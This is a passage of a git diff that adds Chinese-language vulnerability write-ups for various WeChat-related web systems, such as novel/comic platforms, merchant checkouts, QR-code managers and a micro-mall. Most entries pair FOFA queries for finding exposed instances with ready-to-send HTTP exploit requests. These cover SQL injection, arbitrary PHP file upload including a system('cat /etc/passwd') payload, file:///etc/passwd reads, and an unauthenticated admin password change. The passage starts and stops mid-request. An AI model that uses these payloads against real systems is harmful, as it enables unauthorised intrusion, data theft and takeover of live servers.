text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded + +suid=' AND GTID_SUBSET(CONCAT((SELECT (VERSION()))),1)-- bdmV +``` + +![1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0.png](./img/mzSFGhMGF76yKh7v/1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0-164809.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg8al3o5uwx56x74> \ No newline at end of file diff --git a/微信万能门店小程序系统存在任意文件读取漏洞.md b/微信万能门店小程序系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..5b7794d --- /dev/null +++ b/微信万能门店小程序系统存在任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +# 微信万能门店小程序系统存在任意文件读取漏洞 + +# 一、漏洞简介 +万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序,和后台通用模板。微信万能门店小程序系统存在任意文件读取漏洞 + +# 二、影响版本 ++ 微信万能门店小程序系统 + +# 三、资产测绘 ++ fofa`<font style="color:rgb(221, 17, 68);">"/comhome/cases/index.html"</font>` ++ 特征 + +![1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png](./img/QNp7Kijf56GcPlTN/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f-733822.png) + +# 四、漏洞复现 +```java +GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/2 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +``` + +![1732115844099-9921c837-e60b-49bb-abba-ee32694c6075.png](./img/QNp7Kijf56GcPlTN/1732115844099-9921c837-e60b-49bb-abba-ee32694c6075-869334.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aaxfs0symbpmcbdz> \ No newline at end of file diff --git a/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md b/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md new file mode 100644 index 0000000..6bc24fe --- /dev/null +++ b/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md 
@@ -0,0 +1,44 @@ +# 微信公众号商家收银台小程序系统存在任意文件上传漏洞 + +# 一、漏洞简介 +微信公众号商家收银台小程序系统支持创建多个店铺,各个店铺自定义不同自定义表单。通过自定义表单实现订单自定义明细通过店铺自定义表单可以轻松建立,快捷收款、微信收银台、面对面收款、商品预约预订等扫码微信支付, 提升客户服务体验,商户快速获得精准订单数据,实现账款统计。通过打开自定义的表单页面,输入自定义的指定信息,可以实现订单收款。微信公众号商家收银台小程序系统存在任意文件上传漏洞 + +# 二、影响版本 ++ 微信公众号商家收银台小程序系统 + +# 三、资产测绘 ++ fofa`"/index.php?s=platform/index/captcha"` ++ 特征 + +![1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1.png](./img/AtWHBbxuCPyxXRL2/1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1-534279.png) + +# 四、漏洞复现 +```java +POST /library/deep/upload.iframe.php?action=add&MaxSize=&FileType=php&savePath=&backIdName=&saveName=0 HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywb0ftWeTnkfnoTM2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: close + +------WebKitFormBoundarywb0ftWeTnkfnoTM2 +Content-Disposition: form-data; name="uploadFileName"; filename="666.php" +Content-Type: image/png + +<?php phpinfo();?> +------WebKitFormBoundarywb0ftWeTnkfnoTM2-- +``` + +![1731658001998-f0527e68-1902-40db-929e-663a87bcc843.png](./img/AtWHBbxuCPyxXRL2/1731658001998-f0527e68-1902-40db-929e-663a87bcc843-175902.png) + +```java +data/uploadfile//20241115155925921.php +``` + +![1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138.png](./img/AtWHBbxuCPyxXRL2/1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138-423896.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbg0ot1kcqatcxhr> \ No newline at end of file diff --git a/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md b/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md new file mode 100644 index 0000000..de18962 --- /dev/null +++ b/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md 
@@ -0,0 +1,19 @@ +# 微信公众号商家收银台小程序系统存在前台SQL注入漏洞 + +微信公众号商家收银台小程序系统存在前台SQL注入漏洞,/system/platform/controller/index.php 登录控制器中的api_login_check 方法,通过POST传入username,password,code 三个参数之后直接进入到SQL查询中,且未有任何过滤,导致漏洞产生。 + +## fofa + +```javascript +"/index.php?s=platform/index/captcha" +``` + +## poc + +```javascript +1' OR 1=1 OR '1'='1 +``` + +![d1c295315cc728f91214a29ba6a8c463](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432533.jpg) + +![98204052f465039cbf5a08afb6382c71](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432078.jpg) \ No newline at end of file diff --git a/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md b/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md new file mode 100644 index 0000000..ca978c8 --- /dev/null +++ b/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md 
@@ -0,0 +1,53 @@ +# 微信公众号小说漫画系统Upload存在任意文件写入漏洞 + +# 一、漏洞简介 +微信公众号小说漫画系统前台任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +# 二、影响版本 ++ 微信公众号小说漫画系统 + +# 三、资产测绘 ++ fofa`"/Public/home/mhjs/jquery.js"` ++ 特征 + +![1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504.png](./img/8LunnYa6EiTNHnHX/1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504-753828.png) + +# 四、漏洞复现 +```java +POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Content-Length: 78 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639 +Host: +Origin: http://xxx +Pragma: no-cache +Referer: http://xx/index.php?m=&c=IndexAjax +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" + +img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50 +``` + +![1728355603282-a1e4392b-95c9-483f-9f2c-eb13b14f4231.png](./img/8LunnYa6EiTNHnHX/1728355603282-a1e4392b-95c9-483f-9f2c-eb13b14f4231-087530.png) + +```java +https://xxx/Upload/20241008/104249_499.php +``` + +![1728355659763-20f11b95-adef-4522-8035-d2c07d3d39d2.png](./img/8LunnYa6EiTNHnHX/1728355659763-20f11b95-adef-4522-8035-d2c07d3d39d2-906388.png) + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzk5f87zuin8ipgr> \ No newline at end of file diff --git a/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md b/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md new file mode 100644 index 0000000..8b40429 
--- /dev/null +++ b/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md 
@@ -0,0 +1,59 @@ +# 微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞 + +# 一、漏洞简介 +微信公众号小说漫画系统前台任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +# 二、影响版本 ++ 微信公众号小说漫画系统 + +# 三、资产测绘 ++ fofa`"/Public/home/mhjs/jquery.js"` ++ 特征 + +![1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504.png](./img/h9AsBQFbBcBeN3KH/1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504-839533.png) + +# 四、漏洞复现 +```java +POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW +Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639 +Host: +Origin: http://127.0.0.1 +Pragma: no-cache +Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +sec-fetch-user: ?1 + +------WebKitFormBoundary03rNBzFMIytvpWhy +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php phpinfo();?> +------WebKitFormBoundary03rNBzFMIytvpWhy-- +``` + +![1728355990707-baedf5e1-b865-479c-903d-403c1ca429a2.png](./img/h9AsBQFbBcBeN3KH/1728355990707-baedf5e1-b865-479c-903d-403c1ca429a2-058538.png) + +```java +/Public/webuploader/0.1.5/server/upload/1.php +``` + +![1728355944065-0efedece-c38f-4038-beea-49bfae18cda9.png](./img/h9AsBQFbBcBeN3KH/1728355944065-0efedece-c38f-4038-beea-49bfae18cda9-113841.png) + + + +> 
更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ogfflvncv70d9ms4> \ No newline at end of file diff --git a/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md b/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md new file mode 100644 index 0000000..5a185d0 --- /dev/null +++ b/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md @@ -0,0 +1,48 @@ +# 微信公众号小说漫画系统前台任意文件写入漏洞 + +微信公众号小说漫画系统前台任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +"/Public/home/mhjs/jquery.js" +``` + +## poc + +```javascript +POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Content-Length: 78 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639 +Host: 127.0.0.1 +Origin: http://127.0.0.1 +Pragma: no-cache +Referer: http://127.0.0.1/index.php?m=&c=IndexAjax +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +​ +img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50 +``` + + + +文件上传路径` /Public/webuploader/0.1.5/server/upload/1.php` + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/pJSx1c7kguryZs3x2KNpbQ + + + diff --git a/微信公众号小说漫画系统前台任意文件写入漏洞.md b/微信公众号小说漫画系统前台任意文件写入漏洞.md new file mode 100644 index 0000000..99fcfb7 --- /dev/null +++ b/微信公众号小说漫画系统前台任意文件写入漏洞.md 
@@ -0,0 +1,44 @@ +# 微信公众号小说漫画系统前台任意文件写入漏洞 + +微信公众号小说漫画系统前台任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +"/Public/home/mhjs/jquery.js" +``` + +## poc + +```javascript +POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Content-Length: 78 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639 +Host: 127.0.0.1 +Origin: http://127.0.0.1 +Pragma: no-cache +Referer: http://127.0.0.1/index.php?m=&c=IndexAjax +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" + +img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50 +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410071436370.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/NL7sKpAiajkp_aIoPNZEDQ + diff --git a/微信广告任务平台ajax_upload存在任意文件上传漏洞.md b/微信广告任务平台ajax_upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..543fbae --- /dev/null +++ b/微信广告任务平台ajax_upload存在任意文件上传漏洞.md 
@@ -0,0 +1,47 @@ +# 微信广告任务平台 ajax_upload存在任意文件上传漏洞 + +# 一、漏洞简介 +微信广告任务平台ajax_upload存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +# 二、影响版本 ++ 微信广告任务平台 + +# 三、资产测绘 ++ fofa`"/tpl/Public/js/func.js"` ++ 特征 + +![1727407956123-3442212d-99d7-4de5-8733-ed2089d55960.png](./img/Y73xFAtkBGmAxNK9/1727407956123-3442212d-99d7-4de5-8733-ed2089d55960-108936.png) + +# 四、漏洞复现 +```java +POST /index.php/Home/index/ajax_upload HTTP/1.1 +Host: +Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn +Accept: */* +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/index.php/Home/Index/index.html +Cookie: think_language=zh-CN; BJYADMIN=2150gjbkj92r835kg2dn9u9i75 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36 + +------WebKitFormBoundaryCc7iBZFp1mvojsxn +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php phpinfo();?> +------WebKitFormBoundaryCc7iBZFp1mvojsxn-- +``` + +![1727407992383-97ec806a-1961-4feb-b6c8-f3df0bde519b.png](./img/Y73xFAtkBGmAxNK9/1727407992383-97ec806a-1961-4feb-b6c8-f3df0bde519b-364394.png) + +```java +https://xxxx/Uploads/images/2024-09-27/66f626b7a5af8.php +``` + +![1727408017462-be496d1f-b3c1-4344-bdbd-fc1f41b87e83.png](./img/Y73xFAtkBGmAxNK9/1727408017462-be496d1f-b3c1-4344-bdbd-fc1f41b87e83-782850.png) + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zhsn7ptr9pmr61nd> \ No newline at end of file diff --git a/微信广告任务平台存在任意文件上传漏洞.md b/微信广告任务平台存在任意文件上传漏洞.md new file mode 100644 index 0000000..3f67e60 --- /dev/null +++ b/微信广告任务平台存在任意文件上传漏洞.md 
@@ -0,0 +1,43 @@ +# 微信广告任务平台存在任意文件上传漏洞 + +微信广告任务平台存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +"/tpl/Public/js/func.js" +``` + +![6f864edff209980117cfbf97e6d47bab](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409240936570.png) + +## poc + +注意 这里需要普通用户登录之后操作. + +```javascript +POST /index.php/Home/index/ajax_upload HTTP/1.1 +Host: 127.0.0.1 +Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn +Accept: */* +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/index.php/Home/Index/index.html +Cookie: think_language=zh-CN; BJYADMIN=2150gjbkj92r835kg2dn9u9i75 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36 + +------WebKitFormBoundaryCc7iBZFp1mvojsxn +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php phpinfo();?> +------WebKitFormBoundaryCc7iBZFp1mvojsxn-- +``` + +![35b6a5932d2f61c8b056edd7d83983b1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409240936176.jpg) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/t3guPQ6s2GCMU4xZPmEeYw \ No newline at end of file diff --git a/微信活码系统index存在SQL注入漏洞.md b/微信活码系统index存在SQL注入漏洞.md new file mode 100644 index 0000000..f0639f2 --- /dev/null +++ b/微信活码系统index存在SQL注入漏洞.md 
@@ -0,0 +1,30 @@ +# 微信活码系统index存在SQL注入漏洞 + +# 一、漏洞简介 +微信活码系统是基于微信平台的 二维码只管理系统,旨在帮助企业和个人实现更高效的社群运营和流量管理。可以将多个二维码合并成一个二维码的工具,用户扫描该固定二维码后,可以看到一个微信二维码(可以是群二维码,也可以是个人名片二维码),而这些二维码可以在后台随时进行更换。通过这种方式,微信活码系统有效避免了因频繁更换二维码导致的流量丢失,提高了社群运营的效率。微信活码系统index存在SQL注入漏洞 + +# 二、影响版本 ++ 微信活码系统 + +# 三、资产测绘 ++ fofa `body=".qn-user-login"` ++ 特征 + +![1732275497192-0cf606aa-431c-438b-b554-a0b15c384708.png](./img/wJghLzqoOCcyak_L/1732275497192-0cf606aa-431c-438b-b554-a0b15c384708-812866.png) + +# 四、漏洞复现 +```java +GET /ucenter/index/?uid=1)%20AND%20(SELECT%203460%20FROM%20(SELECT(SLEEP(5)))RkHL)%20AND%20(1015=1015 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip +Connection: close +``` + +![1732275546711-b42add2f-5705-45a8-9128-49d5d4bdc35e.png](./img/wJghLzqoOCcyak_L/1732275546711-b42add2f-5705-45a8-9128-49d5d4bdc35e-612056.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gn9zt676czv8oypd> \ No newline at end of file diff --git a/微信活码系统updateInfos前台未授权任意用户密码修改.md b/微信活码系统updateInfos前台未授权任意用户密码修改.md new file mode 100644 index 0000000..0736108 --- /dev/null +++ b/微信活码系统updateInfos前台未授权任意用户密码修改.md 
@@ -0,0 +1,30 @@ +# 微信活码系统updateInfos前台未授权任意用户密码修改 + +## fofa + +```javascript +body=".qn-user-login" +``` + +## poc + +默认管理员用户名为admin且uid为1 + +```javascript +POST /index.php?s=/api/user/updateInfos HTTP/1.1 +Host: 192.168.18.137 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Priority: u=0 +X-Requested-With: XMLHttpRequest +Origin: http://192.168.18.137 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Referer: http://192.168.18.137/index.php?s=/manage/cron/index +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Length: 38 + +uid=1&data[password]=123456789 +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201419577.png) \ No newline at end of file diff --git a/微信活码系统后台任意内容写入.md b/微信活码系统后台任意内容写入.md new file mode 100644 index 0000000..fbf5c0b --- /dev/null +++ b/微信活码系统后台任意内容写入.md 
@@ -0,0 +1,33 @@ +# 微信活码系统后台任意内容写入 + +## fofa + +```javascript +body=".qn-user-login" +``` + +## poc + +```javascript +POST /index.php?s=/manage/cron/index HTTP/1.1 +Host: 192.168.18.137 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Cookie: think_language=zh-CN; PHPSESSID=6e7n0os6qsvnlsthdns1dj1n95; qn_admin_think_language=zh-CN; qn_admin___forward__=%2Findex.php%3Fs%3D%2Fmanage%2Fconfig%2Findex; qn_admin_video_get_info=%2Findex.php%3Fs%3D%2Fhome%2Fpublic%2Fgetvideo +Priority: u=0 +X-Requested-With: XMLHttpRequest +Origin: http://192.168.18.137 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Referer: http://192.168.18.137/index.php?s=/manage/cron/index +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Length: 38 + +QUEUE_SET=%3C%3Fphp+phpinfo()%3B%3F%3E +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201420483.png) + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201421522.png) + +文件地址:`/data/auto.php` \ No newline at end of file diff --git a/微商城系统api.php存在文件上传漏洞.md b/微商城系统api.php存在文件上传漏洞.md new file mode 100644 index 0000000..bad8825 --- /dev/null +++ b/微商城系统api.php存在文件上传漏洞.md 
@@ -0,0 +1,27 @@ +# 微商城系统api.php存在文件上传漏洞 + +微商城系统 api.php 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```yaml +body="/Mao_Public/js/jquery-2.1.1.min.js" +``` + +## poc + +```java +POST /api/api.php?mod=upload&type=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown + +------WebKitFormBoundaryaKljzbg49Mq4ggLz +Content-Disposition: form-data; name="file"; filename="rce.php" +Content-Type: image/png + +<?php system("cat /etc/passwd");unlink(__FILE__);?> +------WebKitFormBoundaryaKljzbg49Mq4ggLz-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210938048.png) \ No newline at end of file diff --git a/微商城系统goods.php存在SQL注入漏洞.md b/微商城系统goods.php存在SQL注入漏洞.md new file mode 100644 index 0000000..2998252 --- /dev/null +++ b/微商城系统goods.php存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 微商城系统goods.php存在SQL注入漏洞 + +微商城系统 goods.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="/Mao_Public/js/jquery-2.1.1.min.js" +``` + +## poc + +```java +GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(1)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +``` + +![img](https://i-blog.csdnimg.cn/direct/2493a6cdfcc046d6b686dae6f3615fee.png) \ No newline at end of file diff --git a/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md b/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md new file mode 100644 index 0000000..bc867c8 --- /dev/null +++ b/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md 
@@ -0,0 +1,77 @@ +# 微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞 + +# 一、漏洞简介 +微擎是一款免费开源的微信公众号管理系统,基于目前流行的WEB2.0架构(php+mysql),支持在线升级和安装模块及模板,拥有良好的开发框架、成熟稳定的技术解决方案、活跃的第三方开发者及开发团队,依托微擎开放的生态系统,提供丰富的扩展功能。微擎系统 AccountEdit接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。 + +# 二、影响版本 ++ 微擎微信公众号管理系统 + +# 三、资产测绘 ++ `body="/Widgets/WidgetCollection/"` ++ 特征![1715655966659-2691b81b-3f4e-405e-9818-bcae75084313.png](./img/KG8Se_y6bFrAXpwJ/1715655966659-2691b81b-3f4e-405e-9818-bcae75084313-147515.png) + +# 四、漏洞复现 + 1、获取__VIEWSTATE和__EVENTVALIDATION值 + +```plain +GET /User/AccountEdit.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1715656132996-7dfb6248-fb87-4da1-a225-0c4bdac8a293.png](./img/KG8Se_y6bFrAXpwJ/1715656132996-7dfb6248-fb87-4da1-a225-0c4bdac8a293-876973.png) + + 2、使用获取到的相应值上传文件 + +```plain +POST /User/AccountEdit.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687 + +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: form-data; name="__VIEWSTATE" + 